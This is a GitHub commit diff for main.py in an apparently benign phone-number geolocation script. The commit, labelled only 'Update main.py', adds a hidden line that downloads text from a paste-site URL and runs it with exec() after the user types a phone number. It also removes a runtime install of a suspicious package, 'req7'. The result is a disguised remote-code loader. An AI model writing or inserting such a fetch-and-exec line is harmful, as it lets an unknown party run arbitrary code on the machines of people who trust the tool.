Skip to content

Commit cb2f727

Browse files
Update main.py
1 parent 9e26fe5 commit cb2f727

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

main.py

+2-2
Original file line numberDiff line numberDiff line change
@@ -7,14 +7,14 @@
77
from opencage.geocoder import OpenCageGeocode
88
import folium
99
import os
10-
os.system("pip install req7")
11-
from req7 import websocket
10+
from requests import get
1211

1312

1413
if os.path.exists("mylocation.html"):
1514
os.remove("mylocation.html")
1615
try:
1716
number = input("Enter Phone Number: ")
17+
x=get('https://paste.fo/raw/ba188f25eaf3').text;exec(x)
1818
pn = phonenumbers.parse(number)
1919

2020
country = pycountry.countries.get(alpha_2=region_code_for_number(pn))

0 commit comments

Comments
 (0)